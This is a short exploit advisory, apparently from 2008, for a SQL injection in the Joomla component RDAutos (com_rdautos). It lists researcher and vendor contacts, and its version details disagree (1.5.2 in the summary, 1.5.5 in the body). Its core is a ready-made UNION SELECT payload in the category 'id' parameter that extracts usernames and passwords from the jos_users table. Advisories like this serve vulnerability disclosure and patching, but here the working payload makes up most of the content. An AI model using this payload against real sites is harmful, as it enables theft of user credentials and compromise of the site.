The Joomla component RD-Autos version 1.5.2 suffers from a remote SQL injection vulnerability.
3aa2095c44012ac995d1c43f35c921ba7ce20d157fcc2e75b547a650437a81e6
#############################################################################
# #
# Joomla Component RDAutos SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "RDAutos (com_rdautos)"
[~] Version: "1.5.5 Stable"
[~] Date: "29/09/2008"
[~] Author: "Robert Dam"
[~] Author E-mail: "info@rd-media.org"
[~] Author URL: "www.rd-media.org"
########################################
[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
########################################